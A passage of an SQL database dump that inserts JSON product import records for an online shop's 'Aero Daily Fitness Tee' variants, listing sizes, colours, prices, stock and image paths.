/ms06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Organic Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"496\":{\"sku\":\"MS01-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XS-Black\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"497\":{\"sku\":\"MS01-XS-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XS-Brown\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xs-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Brown\"},\"498\":{\"sku\":\"MS01-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XS-Yellow\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"499\":{\"sku\":\"MS01-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-S-Black\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(6, 'catalog_product', 'append', '{\"500\":{\"sku\":\"MS01-S-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-S-Brown\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-s-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Brown\"},\"501\":{\"sku\":\"MS01-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-S-Yellow\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"502\":{\"sku\":\"MS01-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-M-Black\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"503\":{\"sku\":\"MS01-M-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-M-Brown\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-m-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Brown\"},\"504\":{\"sku\":\"MS01-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-M-Yellow\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":